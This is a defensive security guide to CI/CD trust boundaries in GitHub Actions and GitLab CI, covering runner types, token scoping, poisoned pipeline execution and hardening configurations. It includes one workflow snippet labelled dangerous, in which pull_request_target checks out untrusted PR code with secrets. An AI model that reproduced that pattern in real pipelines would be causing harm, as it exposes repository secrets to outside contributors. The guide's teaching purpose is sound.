CI/CD Execution Models and Trust Assumptions: A Security Guide

Introduction

CI/CD pipelines are among the most privileged components in any modern software organization. They clone source code, access secrets, build artifacts, and deploy to production — often with minimal human oversight. Yet despite this extraordinary level of access, the trust models underpinning these pipelines are rarely made explicit.

When a pipeline runs, it implicitly answers a chain of security questions: Who triggered this execution? What code is being run? What identity does the pipeline assume? What resources can it reach? In most organizations, these questions are answered by default configurations rather than deliberate security decisions.

This guide maps out how different CI/CD execution models work, where trust is assumed versus verified, and how to harden your pipelines against the real-world attack patterns that exploit these gaps. Whether you’re running GitHub Actions, GitLab CI, or another platform, the underlying trust dynamics are universal — and understanding them is essential to securing your software supply chain.

What Is a CI/CD Execution Model?

A CI/CD execution model defines the full lifecycle of how pipeline code is triggered, where it physically runs, what identity it assumes during execution, and what resources it can access. It is, in essence, the security architecture of your automation layer.

Every execution model must answer four fundamental questions:

  • Trigger: What event initiates the pipeline, and who or what is authorized to cause that event?
  • Environment: Where does the pipeline code execute — on what infrastructure, with what OS, and with what degree of isolation?
  • Identity: What credentials, tokens, or service accounts does the running pipeline possess?
  • Access: What downstream systems, secrets, registries, and deployment targets can the pipeline reach?

The way these questions are answered varies dramatically across execution environments:

SaaS-Hosted Runners

Platforms like GitHub Actions (GitHub-hosted runners) and GitLab.com shared runners provide ephemeral virtual machines managed by the CI/CD vendor. Each job typically gets a fresh VM that is destroyed after execution. The platform manages patching, isolation, and lifecycle. The trade-off is that you trust the vendor’s isolation guarantees — you cannot inspect or control the underlying infrastructure.

Self-Hosted Runners

Organizations deploy their own runner agents on infrastructure they control — VMs, bare metal, or Kubernetes pods. This gives full control over the execution environment but shifts the responsibility for isolation, patching, and credential management entirely to the operator. A misconfigured self-hosted runner is one of the most common vectors for lateral movement in CI/CD attacks.

Containerized Execution

Many pipelines run jobs inside containers, either on self-hosted infrastructure or on managed Kubernetes clusters. Container-based execution provides process-level isolation and reproducible environments, but containers are not security boundaries in the same way VMs are. Shared kernel access, mounted volumes, and Docker socket exposure can all undermine the isolation model.

Serverless and On-Demand Execution

Some modern CI/CD systems (such as AWS CodeBuild or certain Buildkite configurations) spin up entirely on-demand compute for each job. These models offer strong isolation guarantees since each execution gets a dedicated, short-lived compute instance, but they introduce complexity around credential bootstrapping and network access control.

Understanding which model your organization uses — and the security properties it does and does not provide — is the foundation for reasoning about CI/CD trust.

Trust Boundaries in CI/CD

A trust boundary exists wherever control passes from one entity or system to another. In CI/CD, there are several critical trust boundaries, and failures at any of them can lead to full pipeline compromise.

Source Code Repository to Pipeline Trigger

The first trust boundary is between the code repository and the pipeline trigger mechanism. When a developer pushes a commit or opens a pull request, the CI/CD platform decides whether and how to execute a pipeline. The critical question is: who can trigger pipeline execution, and can they control what code the pipeline runs?

In many configurations, anyone who can open a pull request — including external contributors to public repositories — can trigger pipeline execution. If the pipeline definition itself comes from the PR branch, the contributor effectively controls the code that runs in your CI environment.

Pipeline Definition to Execution Environment

The second trust boundary separates the pipeline definition (the YAML file, the Jenkinsfile, the build script) from the environment where it executes. Key questions include: Does the runner have access to the network? Can the pipeline install arbitrary software? Can it modify the runner itself for future jobs?

On shared or persistent runners, a malicious pipeline definition could install a backdoor that persists across subsequent job executions — affecting entirely different repositories and teams.

Execution Environment to Secrets and Credentials

Pipelines need credentials to do useful work: API tokens, cloud provider keys, registry passwords, signing keys. The trust boundary between the execution environment and the secrets store determines what a compromised pipeline can access. Over-broad secret access is one of the most common and dangerous misconfigurations in CI/CD.

Build Output to Deployment Target

The final trust boundary is between what the pipeline produces (a container image, a binary, a Terraform plan) and the system where that output is deployed. If the pipeline identity that builds an artifact is the same identity that deploys it to production, there is no separation of duties. A single compromised build step can lead directly to production compromise.

Mapping the Trust Zones

Conceptually, a CI/CD pipeline traverses four trust zones:

Zone 1: Source Control (Developer workstations, branches, PRs)
   ↓ [Trigger boundary]
Zone 2: Pipeline Definition (YAML/config parsed by CI platform)
   ↓ [Execution boundary]
Zone 3: Execution Environment (Runner, container, VM — with secrets)
   ↓ [Deployment boundary]
Zone 4: Deployment Targets (Production, staging, registries, cloud APIs)

Each arrow represents a trust boundary. Security controls should exist at every transition: branch protection rules at the trigger boundary, runner isolation at the execution boundary, scoped credentials at the secrets boundary, and deployment approvals at the deployment boundary.

GitHub Actions Execution Model

GitHub Actions is one of the most widely adopted CI/CD platforms, and its execution model has several unique trust characteristics worth understanding in depth.

GitHub-Hosted vs Self-Hosted Runners

GitHub-hosted runners are ephemeral VMs provisioned by GitHub for each job. They run on Azure infrastructure, are destroyed after each job completes, and provide strong isolation between jobs. Self-hosted runners, by contrast, are machines you register with GitHub. They persist between jobs, can accumulate state, and — critically — any repository in the organization with access to the runner can execute code on it.

For self-hosted runners, GitHub explicitly warns: do not use self-hosted runners with public repositories. Any fork can submit a pull request that triggers a workflow, and that workflow executes on your infrastructure with your network access.

GITHUB_TOKEN Permissions and Scope

Every workflow run receives an automatic GITHUB_TOKEN with permissions scoped to the repository. By default, this token has broad read/write permissions to repository contents, packages, issues, and more. The permissions key allows you to restrict this token to only what’s needed:

permissions:
  contents: read
  packages: write
  id-token: write   # For OIDC federation

Setting top-level permissions to read-all or even empty ({}) and then granting specific permissions per job is a critical hardening step. Without this, any compromised step in any job has write access to your repository.

Fork PR Workflows: pull_request vs pull_request_target

This is one of the most dangerous trust boundaries in GitHub Actions. The pull_request event runs the workflow definition from the PR’s head branch — meaning the contributor controls the workflow code — but critically, it does not have access to repository secrets. The pull_request_target event runs the workflow from the base branch (your repository’s main branch) but does have access to secrets.

The danger arises when pull_request_target workflows check out the PR’s head branch code:

# DANGEROUS: pull_request_target with explicit checkout of PR code
on: pull_request_target

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      # This now runs UNTRUSTED CODE with access to SECRETS
      - run: npm install && npm test

This pattern gives an attacker the ability to execute arbitrary code with access to your repository’s secrets. It is the canonical example of poisoned pipeline execution in GitHub Actions.

Reusable Workflows and Trust Delegation

Reusable workflows allow you to centralize pipeline logic in a shared repository and call it from other repositories. When a reusable workflow is invoked, it runs with the permissions and secrets of the calling workflow. This creates a trust delegation chain: you’re trusting that the reusable workflow code (in another repository) will handle your secrets responsibly.

Pin reusable workflows to a specific commit SHA, not a branch or tag:

jobs:
  deploy:
    uses: my-org/shared-workflows/.github/workflows/deploy.yml@a1b2c3d4e5f6
    secrets: inherit

Environment Protection Rules

GitHub Environments provide a critical trust boundary for deployment workflows. You can configure required reviewers, wait timers, and branch restrictions on environments. When a job references an environment, it must satisfy the protection rules before secrets associated with that environment are made available:

jobs:
  deploy-production:
    runs-on: ubuntu-latest
    environment:
      name: production
      url: https://example.com
    steps:
      - name: Deploy
        run: ./deploy.sh
        env:
          AWS_ACCESS_KEY_ID: ${{ secrets.PROD_AWS_KEY }}

This ensures that even if a workflow is triggered, production credentials are not exposed without human approval.

GitLab CI Execution Model

GitLab CI has a different execution model with its own trust characteristics, particularly around runner scoping and variable protection.

Shared Runners vs Group Runners vs Project Runners

GitLab offers three levels of runner scoping. Shared runners (on GitLab.com, these are managed by GitLab) are available to all projects. Group runners are available to all projects within a GitLab group. Project runners are dedicated to a single project. The scoping determines the blast radius of a compromised runner — a shared runner compromise affects all projects, while a project runner compromise is contained to one project.

For sensitive workloads, always prefer project-specific runners with appropriate tagging:

deploy-production:
  stage: deploy
  tags:
    - production-runner
    - isolated
  script:
    - ./deploy.sh
  rules:
    - if: $CI_COMMIT_BRANCH == "main"

Protected Branches and Protected Variables

GitLab’s protected variable mechanism is a key trust control. Variables marked as “protected” are only exposed to pipelines running on protected branches or protected tags. This means that a pipeline triggered by a merge request from a feature branch — or worse, from a fork — will not have access to protected variables.

This is GitLab’s primary mechanism for preventing secret exposure to untrusted code:

# In .gitlab-ci.yml, protected variables are only available on protected branches
deploy:
  stage: deploy
  script:
    - echo "Deploying with $PRODUCTION_API_KEY"
  rules:
    - if: $CI_COMMIT_BRANCH == "main"  # main is a protected branch
  environment:
    name: production

CI_JOB_TOKEN Scope and Limitations

Every GitLab CI job receives a CI_JOB_TOKEN, an automatically generated token scoped to the project. By default, this token can access other projects’ resources, which creates an implicit trust relationship. GitLab allows you to restrict CI_JOB_TOKEN access by configuring an allowlist of projects that can be accessed — a critical hardening step that limits lateral movement if a pipeline is compromised.

In your project settings under CI/CD → Token Access, restrict the token scope to only the projects your pipeline genuinely needs to interact with.

Merge Request Pipelines and Trust Boundaries

GitLab distinguishes between branch pipelines and merge request pipelines. Merge request pipelines run in the context of the merge request and have access to a limited set of predefined variables. For pipelines triggered by merge requests from forks, GitLab does not expose protected variables or project-level secrets — this is an intentional trust boundary.

However, pipelines running on the merged result (the merge_request_event with merged results pipelines enabled) still execute the code from the fork. If your pipeline definition allows arbitrary code execution and the job has access to secrets through non-protected variables, this can still be exploited.

Common Trust Assumption Failures

Understanding the execution models is important, but the real value comes from recognizing the patterns that lead to compromise. These are the trust assumption failures that appear repeatedly in real-world CI/CD breaches.

Poisoned Pipeline Execution (PPE)

Poisoned pipeline execution occurs when an attacker can modify the pipeline definition that runs in a privileged context. This is the most prevalent class of CI/CD vulnerability. It happens when:

  • A pull request triggers a workflow that uses the PR’s version of the pipeline file
  • That workflow has access to secrets or deployment credentials
  • There is no review or approval gate between the PR and the pipeline execution

The attacker modifies the pipeline YAML (or a script it calls) to exfiltrate secrets, inject backdoors into build artifacts, or pivot to internal systems.

Assuming Runner Isolation on Shared Infrastructure

When multiple teams or projects share runners — especially self-hosted runners — there is often an implicit assumption of isolation that does not actually exist. A job running on a shared self-hosted runner may be able to:

  • Read files left behind by previous jobs (cached credentials, build artifacts)
  • Access the Docker socket and inspect or modify other containers
  • Reach internal network resources available to the runner host
  • Install persistent backdoors on the runner for future jobs

Over-Permissioned Service Accounts

A disturbingly common pattern is giving the CI/CD service account broad administrative access — “just to make things work.” An AWS IAM role with AdministratorAccess, a Kubernetes service account with cluster-admin, or a cloud SQL account with DBA privileges. When any step in the pipeline is compromised, the attacker inherits all of these permissions.

Implicit Trust in Third-Party Actions and Templates

Using community GitHub Actions or GitLab CI templates means executing someone else’s code in your pipeline with your secrets. When you reference uses: some-org/some-action@v2, you’re trusting that:

  • The action’s code is not malicious
  • The action’s maintainers haven’t been compromised
  • The v2 tag hasn’t been moved to point to different code
  • The action’s dependencies are trustworthy

Tag references are mutable. An attacker who compromises an action’s repository can move the v2 tag to a malicious commit, and every pipeline referencing that tag will execute the new code on its next run.

Build-Time vs Deploy-Time Identity Confusion

Many pipelines use a single identity (service account, IAM role, or token) for both building and deploying. This conflation means that a compromise during the build phase — which handles untrusted code — gives direct access to deployment targets. The build identity should only be able to produce artifacts. A separate, more restricted deploy identity should be used for deploying those artifacts to production.

Hardening Trust Assumptions

With the threat model clear, here are the concrete mitigations that align controls to trust boundaries.

Explicit Trigger Conditions and Branch Filters

Never allow unrestricted pipeline triggers. Limit what events can trigger what workflows, and ensure that privileged pipelines only run on trusted branches:

# GitHub Actions: restrict deployment to main branch only
on:
  push:
    branches: [main]
  pull_request:
    branches: [main]
    # Only trigger on PRs targeting main; PR code runs without secrets

jobs:
  deploy:
    if: github.event_name == 'push' && github.ref == 'refs/heads/main'
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: ./deploy.sh
# GitLab CI: use rules to restrict sensitive jobs
deploy-production:
  stage: deploy
  script:
    - ./deploy.sh
  rules:
    - if: $CI_COMMIT_BRANCH == "main" && $CI_PIPELINE_SOURCE != "merge_request_event"
      when: manual
      allow_failure: false
  environment:
    name: production

Minimal Token Permissions

Apply the principle of least privilege to every token in your pipeline. In GitHub Actions, set restrictive default permissions and grant specific permissions per job:

# Set restrictive defaults at the workflow level
permissions: read-all

jobs:
  build:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      packages: write
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm run build

  deploy:
    needs: build
    runs-on: ubuntu-latest
    permissions:
      contents: read
      id-token: write  # Only for OIDC, no write to repo
    environment: production
    steps:
      - run: ./deploy.sh

In GitLab, restrict CI_JOB_TOKEN scope in project settings and use protected variables exclusively for sensitive credentials.

Ephemeral, Isolated Runners

Wherever possible, use ephemeral runners that are created fresh for each job and destroyed immediately after. This eliminates persistence-based attacks and cross-job data leakage. For self-hosted environments, tools like GitHub’s Actions Runner Controller (ARC) for Kubernetes or GitLab’s autoscaling runner on AWS/GCP can provision ephemeral runner pods or VMs for each job.

Key properties of a hardened runner configuration:

  • No persistent storage between jobs
  • No shared Docker socket
  • Network segmentation limiting access to only required endpoints
  • No ability for the job to modify the runner’s own configuration

Pinning Actions and Images by SHA

Mutable references (branch names, tags like v2) can be changed by upstream maintainers — or attackers. Pinning to a specific commit SHA ensures that the exact code you reviewed is what runs in your pipeline:

# Instead of this (mutable tag):
- uses: actions/checkout@v4

# Use this (immutable SHA):
- uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11  # v4.1.1

The same principle applies to container images. Use image digests instead of tags:

# Instead of:
image: node:20-alpine

# Use:
image: node@sha256:a1b2c3d4e5f6...  # pin to specific digest

Tools like Dependabot and Renovate can automatically create PRs to update pinned SHAs when new versions are released, so you get both security and maintainability.

Separating Build and Deploy Identities

Implement distinct identities for build and deploy phases. The build identity should have:

  • Read access to source code
  • Write access to artifact storage (container registry, S3 bucket)
  • No access to production environments

The deploy identity should have:

  • Read access to artifact storage
  • Write access to the specific deployment target
  • No access to source code or the ability to trigger builds

Use OIDC federation where possible to eliminate long-lived credentials entirely. Both GitHub Actions and GitLab CI support OIDC tokens that can be exchanged for short-lived cloud provider credentials:

# GitHub Actions OIDC with AWS
jobs:
  deploy:
    permissions:
      id-token: write
      contents: read
    steps:
      - uses: aws-actions/configure-aws-credentials@e3dd6a429d7300a6a4c196c26e071d42e0343502
        with:
          role-to-assume: arn:aws:iam::123456789012:role/deploy-production
          aws-region: us-east-1
# GitLab CI OIDC with AWS
deploy:
  stage: deploy
  id_tokens:
    AWS_TOKEN:
      aud: https://gitlab.com
  script:
    - >
      STS_CREDENTIALS=$(aws sts assume-role-with-web-identity
      --role-arn arn:aws:iam::123456789012:role/deploy-production
      --web-identity-token $AWS_TOKEN
      --role-session-name "gitlab-ci-${CI_JOB_ID}")
    - export AWS_ACCESS_KEY_ID=$(echo $STS_CREDENTIALS | jq -r '.Credentials.AccessKeyId')
    - ./deploy.sh

Conclusion

Every CI/CD pipeline has a trust model. The question is whether that trust model was designed intentionally or emerged accidentally from default configurations and quick fixes.

The execution model you choose — SaaS-hosted, self-hosted, containerized, or serverless — determines the baseline security properties of your pipeline. But the execution model alone is not enough. Trust must be explicitly bounded at every transition: from source code to trigger, from trigger to execution, from execution to secrets, and from build to deployment.

The patterns covered in this guide — poisoned pipeline execution, shared runner abuse, over-permissioned identities, mutable action references, and conflated build/deploy identities — are not theoretical. They are the actual techniques used in real-world supply chain attacks, from the SolarWinds compromise to the Codecov breach and beyond.

Start by mapping your current trust boundaries. Identify where trust is assumed rather than verified. Then apply the hardening measures systematically: restrict triggers, minimize permissions, isolate runners, pin dependencies, and separate identities. Treat your CI/CD pipeline with the same rigor you apply to your production infrastructure — because in practice, it is your production infrastructure’s front door.